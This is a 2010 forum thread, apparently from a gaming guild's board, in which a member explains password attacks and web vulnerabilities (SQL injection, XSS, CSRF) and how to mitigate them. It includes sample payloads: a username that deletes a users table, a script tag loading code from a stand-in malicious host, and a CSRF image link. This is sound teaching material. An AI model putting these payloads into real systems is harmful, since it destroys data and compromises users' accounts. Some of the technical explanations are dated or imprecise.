Black Raven Dragoons

Zancarius · by **Zancarius** » Fri May 28, 2010 3:38 pm

I want to clarify a little bit about how web site security works, and so I'm going to post a little bit related to my own experiences and some industry knowledge that might be interesting to some of you. I think it's important to be educated, and to ensure that you know precisely how certain things work. So far, I've got two posts.

[header=3]Web Application Security: Passwords[/header]

Web application security isn't hard but it's surprisingly difficult to get right. I'm posting this to educate you on what's out there, if you're curious, and to give you some idea how exploits work. It is therefore my hope that you won't then fall prey to information that is incorrect or only half-correct and thus more dangerous to your sanity than your computer. This post will be a fairly lengthy read, a somewhat technical read, but I have attempted to put some effort into writing it such that it is easy to understand. Be aware that some of this article is based on original research; I currently work fairly extensively with web applications and have some knowledge related to how they work, their implementations, and vulnerabilities. If you just flat-out don't want to read any of this, you don't have to. I'm providing it exclusively for educational purposes.

This installment actually has has nothing to do with web application security with the exception of passwords, but it's pertinent to our little corner of the web. As it stands there are currently only five methods that can be used to obtain passwords and at least one method is dependent upon other mechanisms for exploiting the host software (meaning that it's not magical--the attacker has to find a way to access privileged data first before the attack will be successful). These attacks are, in order of easiest to most difficult:

Phishing
Key loggers
Rainbow tables*
Timing attacks**
Brute force

* Requires access to the encrypted passwords and is dependent upon successful attacks targeting the host site.
** Generally difficult and time consuming enough to render it completely unlikely to be used in practice. Requires knowledge of statistics. Unfortunately, almost every application is vulnerable to this unless it is written by an individual familiar with the vulnerability. The plus side is that timing attacks cannot be used to harvest passwords, so why did I include it? Keep reading.

[header=3]The Password Attacks[/header]

Phishing

Phishing is among the most common and probably most successful method of harvesting passwords on the Internet. The general idea is to create a site that looks identical to a valid site likely to be visited by the target users. Examples include banks, credit card companies, online vendors, and even World of Warcraft. The most recent phishing attacks that have been most successful have been those that claim to offer exclusive access to in-game pets or mounts. Phishing sites will also require you to manually enter in your username and password. This attack also requires the least effort on behalf of the attackers; it is up to the users to voluntarily give up their account information.

Incidentally, I would guess this attack is the most difficult to quantify in part because users are liars. Users don't always intend to lie, and it's important to remember that human memory is fallible which presents BOFH administrators the illusion that users lie. Specifically: Unless victims of phishing attacks are pressed for further details, they will not remember that they willingly gave up their account information, because their brain has already associate the activity of providing their username/password combination as a valid action. Valid actions aren't questioned, and I should think that this is part of the reason why a vast majority of people who probably were victims of phishing attacks never remember. It's not being dishonest--it's because our brains have more important things to do, and when we associate an action with a legitimate activity, it suddenly transfers from a questionable act to one that we're unlikely to remember.

This is also why there is so much speculation by those who have had their accounts cracked that there's obviously some dark and sinister deed occurring beneath the surface that Blizzard is a part of.

Key Loggers

Key loggers are somewhat more difficult for an attacker to pull off than phishing, because it requires them to actively install malicious software on the target users' computers. There's plenty of resources here that have been posted by others, so I'm not going to describe a great deal about key loggers and WoW, but for those who need a refresher, here you go: Key loggers are malicious software that can be installed by visiting a compromised site. The software then monitors everything you type (and sometimes all of your mouse movements), records these activities, and then submits it to a web site controlled by the attacker. In order for a key logger to be successful, it must be able to send collected data to another location. Consequently, key loggers are generally only viable for a few months until authorities shut down the sites that collect data from compromised machines.

Key loggers can be defeated by safe browsing habits. There's plenty of tips in our forums on how to browse safely, but I think some of it might need updating.

Rainbow Tables

Despite the fruity name, rainbow tables are a solution that can be fairly effective at "cracking" weak passwords. The only problem with rainbow tables, though, is that the attacker must have access to the encrypted passwords. Assuming the attacker does have access to the passwords (which is difficult in its own right), a rainbow table can be very effective.

Before I describe what a rainbow table is, it's important to understand how most passwords are stored in a database, like the one that powers this forum. Passwords are very rarely stored in plain text. It's a poor security practice, and I think it could even be argued that it's a somewhat borderline breach of privacy. Thus, most passwords are encrypted by a method called "hashing." Hashing is simply a process of generating in an ideal situation output that is fully unique and uniform in length for a given input. MD5 is a popular algorithm for hashing (it has its flaws, which I'll mention in a much later post), and looks something like this:

Code: Select all: purple = bb7aedfa61007447dd6efaf9f37641e3 asdf = 912ec803b2ce49e4a541068d495ab570 OMG something is eating my face = 796df227b8fbb0244b436b4075d48347

The string I input into MD5 is on the left; the output hash from MD5 is on the right. Notice that each hash is of identical length (32 characters) and represented in hexadecimal (0-9 including A-F, so the number 10 becomes the letter "a" and 16 becomes the number "10"). Incidentally, the word "purple" and the home row key combination "asdf" are two of the most common passwords in use. No, I'm not kidding.

A rainbow table makes use of the fact that, for example, the MD5 hash of "purple" is always going to be "bb7aedfa61007447dd6efaf9f37641e3". Therefore, a rainbow table is simply a massive list of passwords containing all 52 printable characters (plus 10 numbers and possibly assorted symbols) in various combinations. It's feasible to find rainbow tables that contain passwords of 12 characters in length or more; however, for each additional character added to the target password, the size of the rainbow tables increase almost exponentially. Rainbow tables are therefore a trade off between speed and space, and it's not uncommon for them to be large enough to fill two DVDs or more.

Using a rainbow table in an actual attack requires that the user have access to the hashed password, such as "bb7aedfa61007447dd6efaf9f37641e3" in our case. The attacker then scans through the list of hashes until he or she encounters the string "bb7aedfa61007447dd6efaf9f37641e3" which matches up with the word "purple." The attacker then has the clear text version of a useable password.

There are several ways to mitigate the usefulness of rainbow tables, including a fairly simple tactic called "salt." Just as salting food adds flavor to it, salting a password increases what is known in the field as "entropy" (basically random noise) and makes the password much more difficult to guess. Salt isn't anything magic: It's generally just a string of random numbers, letters, and symbols that gets added to the password prior to the final hash generation. This makes the password somewhat more secure. To illustrate, let's assume that we're still using the password "purple" and that we're going to add a 10 character salt of "RN*7ZndhLa".

First, we'll hash the password purple and obtain the string "bb7aedfa61007447dd6efaf9f37641e3".

Next, we'll prepend the salt to our hashed password and obtain "RN*7ZndhLabb7aedfa61007447dd6efaf9f37641e3".

Finally, we'll run the combined string through MD5 again and wind up with this: 49eea5527a1e8ffe311b4322c7f46f88.

It doesn't look anything like our original hash of "bb7aedfa61007447dd6efaf9f37641e3" anymore, does it?

One might wonder if it would then be possible for an attacker to generate rainbow tables containing 42 characters. Yes, it is possible, but the tables would probably consume the better part of an 80 gig hard drive and take months to generate.

The important thing to remember about MD5 is that it's an old algorithm and modern processors can generate billions of MD5 hashes in less than a day's worth of use. This implies that raindbow tables can be generated more or less on the fly when needed, so using MD5 to hash a password is really poor practice. The unfortunate thing is that every major message board uses MD5.

The reality of it is pretty much this: If someone can access the password hash, they can very probably find a fancy password (and its salt) in an extremely short period of time. I know I implied--and outright suggested--otherwise, but MD5, SHA1, and other hashes aren't really the best way to store passwords anymore.

Timing Attacks

Let me start with the bad news: Nearly every web application (yes, including phpBB) is susceptible to timing attacks. The good news, though, is that timing attacks are one of the easiest classifications of attacks to defeat and one of the most difficult attacks to pull off within a short period of time. If you want to read a post that explains how to defeat them in code along with what they are go here. My summary here is based on Coda Hale's post.

Timing attacks are based on a little known but highly useful trait of comparisons in code where inequality results in an immediate jump from the statement performing the comparison to the next block of code (or the containing block). Unfortunately for the attacker, attempting to use timing-based attacks to guess passwords is ineffective at best and is no different from using a brute-force attack. Unfortunately for the user, timing-based attacks are ideal for something known as "session hijacking."

Session hijacking involves exploiting the way a web application recognizes someone who's logged in. Whenever you log in (such as now while you're reading this), the web application stores a unique key to identify your session. This key is unique to you and you alone and is usually regenerated whenever you log out. More advanced web applications will often regenerate keys regularly to limit the window of opportunity during which a session hijacking attempt can be made.

It's not obvious at first why session hijacking is bad until you consider this: If an attacker can gain access to the session key, he can then masquerade as you, gaining access to everything in your account. He could obtain your e-mail address, change your password, make posts as you, and generally cause a great deal of havoc and embarrassment. The plus side is that session hijacking is fairly difficult in practice, but it's also the subject of this section.

Here's how a timing-based attack works:

First, let's assume that the server assigned us the session key "7888d65a43501d992cc38638b59964d6". When we log in, the server reads the session key (typically from a cookie) and then compares it with known session keys in the session table. Assuming it has found our exact key, it will perform a comparison one character at a time, which would look something like this:

Code: Select all: if '7' == '7': if '8' == '8': if '8' == '8':

And so on until it encounters the last character. However, if we supplied only a partially correct session identifier of "79af87723dc295f95bdb277a61189a2a", the comparison would look like this:

Code: Select all: if '7' == '7': // This passes if '8' == '9': // This doesn't, bail out.

And therein lies the problem. Inequality forces the comparison operator to bail out the exact instant an inequality is detected. This means that incorrect session identifiers return an invalid response sooner than slightly more valid session identifiers. By using statistics, the attacker can then determine that certain responses are statistically taking a longer period of time to return than others and are therefore more correct. After a period of weeks or months, the attacker can then obtain the session key in its entirety and login as you.

However, there's some good news: This attack usually won't work in practice, and it certainly won't work for passwords. First, most web applications regenerate the session key periodically; regenerating the key would therefore force the attacker to throw out all of his work up to that point in time and start over. Second, by closing your browser, your session key is usually invalidated which also narrows the window of opportunity for this attack. The downside is that selecting "remember my password" usually stores a pre-logged in session or even your password in a cookie, which then remains unchanged indefinitely and opens us up to timing-based attacks all over again. Timing-based attacks are easily defeated, however, and are thus not subject of concern.

A similar method to timing-based attacks is the brute force attack. This operates directly on passwords. Keep reading.

Brute-force Attacks

I'll keep this short because brute-force attacks on user passwords are exceedingly simple but they're also exceedingly time consuming. Essentially, a brute-force attack requires knowledge of the user's username and nothing else.

Brute force attacks are called such because they require an attacker to guess passwords by submitting, one character at a time, new passwords in the hopes of guessing a user's password. This would start with something to the effect of submitting the letter "a" then the letter "b" and so on until the attacker reaches "z". Then, the attacker tries "aa", "ab", and so on until encountering "az." Repeat this until the attacker reaches the word "purple," and upon a successful login, the attacker then knows the user's password.

Brute-force attacks are ridiculously easy to defeat. 1) Use lengthy passwords. A password over 8 characters is generally long enough to render brute-force attacks almost impossible to accomplish in less than a few weeks or months. 2) Limit users to a specific number of failed attempts per hour or day. By locking out accounts after incorrectly guessing passwords after 5 attempts, brute-force attacks are essentially eliminated. 3) A slightly less draconian approach to #2 is to "throttle" or "slow down" the server response after a certain number of failed login attempts. This achieves roughly the same result with far less inconvenience to the user.

[header=3]Passwords are Tough[/header]

That guessing passwords is a difficult endeavor is part of the reason why phishing and key logging are two of the most successful and wide-spread attacks. In fact, these two types of attacks are so successful, I sincerely doubt we'll ever have to worry about the other three methods of obtaining passwords! Basically, it all boils down to a single uncomfortable truth: Account security rests on the user. It doesn't rest on an administrator or a secured system somewhere across the country. If you enter your account details exactly once into a questionable site, you're going to be burned.

In the next post, I'll discuss in detail web application vulnerabilities in the wild. You'll then know enough to understand how web sites are compromised, cracked, and attacked.

Zancarius · by **Zancarius** » Fri May 28, 2010 3:49 pm

[header=3]Web Site Security[/header]

As I mentioned in the previous post, web site security isn't hard but it's surprisingly difficult to get right. Since attackers are more likely to use phishing attacks or key loggers to gain access to your account, there isn't much magic required to guess your password since you're the one providing it! Everything else I mentioned--rainbow tables, timing-based attacks, and brute force--is simply unheard of in the wild.

In other words: 3/5ths of what I wrote above you'll never ever ever ever ever encounter. Ever.

The problem, though, is that the remaining 2/5ths are the most common, most prevalent, and most likely to be the source of compromising your account than the other 3/5ths. With the popularity of WoW, attackers will stop at nothing to coerce you into visiting phishing sites or installing trojans/backdoors/key loggers on your system to snag your account details. I also have some bad news. I'll post it in bold so you can worry about it:

All web sites are potentially vulnerable, not just a humble message board. Every site you visit could be infected, and it is important to browse the web as if this is the case.

Obviously, trusted sites are less likely to serve up malicious software to your computer, and large sites like Youtube, Google, and so on are far less likely to be compromised simply by virtue of the dozens of security measures they typically implement. Smaller sites are generally much more vulnerable, either because they don't have the additional security measures in place to limit the extent of attacks or because their administrators just don't understand the vulnerabilities. Most importantly, however, is the fact that a site doesn't even have to be compromised to do something malicious.

There is a bit of silver lining, however: These attacks aren't generally common, they're easily mitigated, and you really don't need to worry about them at all, because your account is far more likely to be compromised by you willingly giving out your own details to a malicious site. That's not to say you don't need to wory about getting a virus of sorts, but it's a point worth considering.

First, most web application vulnerabilities (from most common to least common) fall into three categories:

SQL injection attacks
Cross-site scripting vulnerabilities (XSS)
Cross-site request forgery (CSRF)

There's a few ironic things about this list, too. First, it's ordered in terms of most difficult to least difficult to fix (SQL injections generally being the most subtle and difficult to fix vulnerabilities simply by merit of the fact that they tend to exist in flocks rather than one or two at at time--a bad programmer will continuu using bad practices through the life of an application unless educated, so an entire app can be affected). Second, while this list is ordered in terms of the most common attacks in the wild, it isn't well understood outside web security that SQL injection vulnerabilities are actually far less common in terms of possible vulnerabilities than CSRF attacks. The difference is that CSRF attacks aren't often exploited because they typically don't have the side effects an attacker wants.

[header=3]SQL Injection Attacks[/header]

SQL injection attacks are the most wide-spread, actively exploited vulnerability online and the one that a vast majority of web applications are affected by. SQL injection attacks are also the subject of this XKCD comic. I won't explain what SQL is; in short, it's a language that's used to obtain data from a database, but you can look it up on Wikipedia if you're painfully curious.

Essentially, an SQL injection exploits the fact that not all web applications are particularly careful when accepting user input. Let's assume that we've written the following authentication system in pseudocode that accepts a username without scrubbing it:

Code: Select all: logged_in = false username = request['username'] userData = execute_query("SELECT * FROM users WHERE username LIKE '" + username "';") if userData['password'] == request['password']: logged_in = true

What this does is obtains the username provided by the user via the request. The request is not checked for validity--anything the user enters will now be contained in the variable "username." Next, we execute an SQL statement by injecting the username into the statement. Ideally, this will work as expected until the user enters in something containing an apostrophe ('), which is a special character used to delimit text fields in SQL. Let's see what the SQL statement would look like with the rather ordinary name of "jane" as a username:

Code: Select all: SELECT * FROM users WHERE username LIKE 'jane';

This query is innocuous and does exactly as expected. It queries the "users" table for the username "jane" and returns all matches. However, if a malicious user has signed up with the name "Bill'sAccount", he might notice that an odd error is generated whenever he logs in. The reason is simple: With the name "Bill'sAccount," the query then becomes the following:

Code: Select all: SELECT * FROM users WHERE username LIKE 'Bill'sAccount';

When the database receives this query, it sees the string as 'Bill' followed by something it doesn't know how to process: sAccount'

It then dies. Depending on how it dies, Bill might then become suspicious that an SQL injection is possible. He could then wipe the entire user table by attempting to login with the username: ';DELETE FROM users;--

When processed, the query plus the username "';DELETE FROM users;--" then becomes:

Code: Select all: SELECT * FROM users WHERE username LIKE '';DELETE FROM users;--';

(Everything after -- becomes a comment, so the trailing "';" is ignored.)

This then creates two valid queries--an empty SELECT statement and a DELETE statement that wipes the entire "users" table.

Ironically, SQL injection is more often used to conduct the following type of attack (cross-site scripting) than it is used to deface sites or delete users. This is because a single SQL injection can insert any kind of code the attacker wants into any part of the site.

Also ironically, SQL injections are fairly easy to fix. Most SQL database drivers provide a method of querying the database called "prepared statements" which are far more secure, faster, and can be reused. The PHP MySQL query statements (newer versions) also provide some basic protections by only allowing each call to execute one statement at a time. Thus, if using PHP and MySQL, the above query would simply execute the empty SELECT statement. (Mind you, leaving the SQL injection in place is still asking for trouble and could cause far more problems, particularly if the behavior of the MySQL bindings change.)

[header=3]Cross-site Scripting Vulnerabilities (XSS)[/header]

Cross-site scripting vulnerabilities are one of the most common classifications of attacks on the web, second only to SQL injection. They're also somewhat more sinister because they tend to be difficult to detect. While XSS attacks are almost always paired with SQL injection--the injection is used to inject the XSS code--this doesn't have to be the case. Any site that fails to validate or clean input provided by users can be susceptible to XSS vulnerabilities.

There are also several subclassifications of XSS attacks. I won't cover them all here, but I will cover the most common case that can be paired with either SQL injection or via a message board that doesn't properly clean input. It's as simple as something like this:

Code: Select all: <script src="http://some.malicious.site/evil-script.js" type="text/javascript"></script>

Whether the code snippet above is injected by an SQL injection or by someone posting a message that didn't get cleaned is unimportant. What happens to visitors, however, is. Assuming someone visits the site with a vulnerable browser, the "evil-script.js" file is then loaded from the remote site (hence being a cross-site scripting vulnerability), executed, and does pretty much whatever it wants.

As I alluded to earlier, there are at least a dozen different methods of using XSS to actively attack visitors' computers. One of the more recent ones that was used to compromise individuals running MSIE6 was clever but certainly not new. The attacker simply created a file containing valid HTML, an evil script to exploit a vulnerability in IE6, and then--wait for it--did something absolutely evil...

He then renamed it as an image. Whahuh?!

That's right, by creating an HTML document containing exploit code and naming it as "evil-image.png," MSIE6 did something absolutely stupid on levels that are surprising even for MS: Rather than rejecting the image as an invalid PNG, MSIE6 will happily process HTML documents that masquerade as image files. Thus, all he had to do to exploit every single MSIE6 user was to do something like the following:

Code: Select all: <img src="http://some.malicous.site/evil-image.png" width="1337" height="42" />

Visitors using browsers other than MSIE6 would then simply see a broken image link ("wow, that retard doesn't know how to link to pictures!") while MSIE6 users would get malicious code served up hot and fresh ("why is my computer so slow now?").

This latter attack also qualifies as an XSS attack. It's also much more difficult to eliminate completely, but thankfully the only people who use MSIE6 are either suicidal or government entities. Maybe both.

[header=3]Cross-site Request Forgery[/header]

Cross-site request forgery attacks or CSRF for short are a little more difficult to understand. Wikipedia defines them as an "attack that exploits the trust a site has in a user's browser." Sounds complicated, doesn't it? The thing is, it's not, and every single web application in existence, almost without fail, is susceptible to this form of attack. More importantly, CSRF attacks are the easiest attack to circumvent and eliminate.

If you read the first post, you might remember me briefly mentioning sessions. CSRF attacks make use of the fact that once a user is logged in to their site, any requests to the site that their browser sends will be validated as authentic and, most importantly, as that user. CSRF is becoming much more common, too, since many sites now offer interactive services using a technology known as AJAX to send queries to the server and update the page without the user having to physically navigate between pages. If you've used gmail or even Twitter, you've seen AJAX in action.

Now, let's assume that a message board grants users an option to delete their posts by clicking the delete button. If the user has JavaScript enabled in their browser, the browser will then send a request to delete that particular post, receives a response from the server, and if the deletion is successful, it will then remove the post from the page using JavaScript--all without having the navigate to a confirmation page, clicking yes, and then returning back to the original thread.

Let's also assume that the request sent to the server from the user's browser is something like the URL: http://some.forum/posts?postid=35&action=delete

When the user clicks delete, JavaScript queries the URL and gathers a response. As I mentioned, if the response indicates success, the user's browser then removes their post from the page without them having to press refresh or navigate between pages.

Here's where the attacker can coerce the user's browser to delete their post without them even clicking on it. Let's say that the attacker knows the post he wants to delete has an ID number of 35. He also really hates the individual who made that particular post. He also has the tendency to post pictures everyone likes to visit. Thus, he could post in a separate thread (let's assume it's titled "PICTURES OF MEH CAT11111") and add the image:

Code: Select all: <img src="http://some.forum/posts?postid=35&action=delete" width="480" height="480" />

Just to be sneaky, he sticks that picture in amongst a few others of actual cats.

As visitors view his thread, the request is sent to the "posts" page to delete post ID 35. Since the visitors thusfar don't own the post, the server sends back a response indicating that they don't have the authorization to delete it. To these visitors, the post appears as a broken link. Perhaps someone else even notices it:

"Hey man, I see you posted 20 pictures but there's one that doesn't show up. Could you fix it?"

The thread grows a little as people view the cats until the moment our victim comes in to view it. As soon as he does, his browser starts loading the pictures including the one pointing to the URL http://some.forum/posts?postid=35&action=delete

Suddenly, the victim's post in the other thread disappears. He won't notice it at first, of course, because it might be a thread that he only checks once in a while. Maybe the victim also posts a note in the cat thread:

"Nice cat pictures. I like the one sitting in the sink."

The attacker sees this and double-checks the other thread and notices that the victim's post is gone. He then goes back to his cat pictures, fixes the "broken" link by replacing it with an actual picture, and then no one is any the wiser.

Some days later, the victim comes back and might notice his post is gone.

"Hey, weird. I didn't delete my post about how much I hate dogs. Did the forum eat it?"

The attacker then laughs his ass off, because he knows the attack was successful. The administrator might point out that the forum doesn't just "eat" posts and that he had to physically delete it himself. Maybe the victim makes another post. Maybe the attacker repeats the trick ad nauseum. Maybe the victim doesn't even notice to begin with.

The upshot is that CSRF is a sinister method of attacking, because it's the victim's browser that does the dirty work for the attacker. Just imagine what'd happen if this were a banking site that allowed transactions between users.

Fortunately, CSRF is really easy to fix, and can be done so by validating user requests. If a user has physically requested a form, the server can validate that, indeed, the user has made a real request sometime in the last 15 minutes and allow the deletion (or transaction) to complete. However, the best solution by far is to use a random "token" generated by the server and sent along with the request. That way, if the token is something like "15689671981234", and the victim encounters the deletion link that the attacker crafted (the attacker won't know the random token), the deletion fails and the CSRF attack is foiled.

Note: phpBB doesn't allow messages to be deleted in this matter. Because the version we're running is so old, it's not susceptible to CSRF attacks.

[header=3]It's important...[/header]

It's important to note that SQL injection attacks, XSS, and CSRF vulnerabilities almost never used individually and almost always used in tandem with another form of attack. Recently, a bug tracking site hosted for the Apache Software Foundation by Atlassian was exploited with a combined CSRF and XSS attack that compromised several accounts which the attacker then used to make modifications to some software on the host. The upshot, though, is that the individual using compromised accounts made an effort to click on a questionable link--while they were logged in. This then exploited their credentials to make changes to their account. So, in short, most vulnerabilities tend to travel in packs and exceptionally dangerous ones tend to require some form of user interaction.

For the one or two readers still with me at this point, I hope you've gotten some exposure to how exploits work in the world of web applications. It's a lot more complicated than just a "script kiddie" with access to a mouse. It's also a world where the only person who's going to look out for you is you.

Black Raven Dragoons

Hacking on the Web

Hacking on the Web

Who is online